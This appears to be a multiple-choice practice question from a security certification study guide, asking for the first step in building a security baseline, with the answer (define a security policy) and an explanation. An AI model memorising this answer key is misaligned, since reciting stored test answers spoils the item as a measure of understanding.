Which of the following is the first step in creating a security baseline? Define a security policy Install software patches Perform vulnerability testing Mitigate risk

When creating a security baseline, you should first define what the security policy will be for the organization. The organization might already have a policy written and expected to be enforced. See the section "Hardening Operating Systems" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: After a security policy is created, perform vulnerability testing and mitigate risks by installing software patches, uninstalling applications, disabling unnecessary services, and so on.


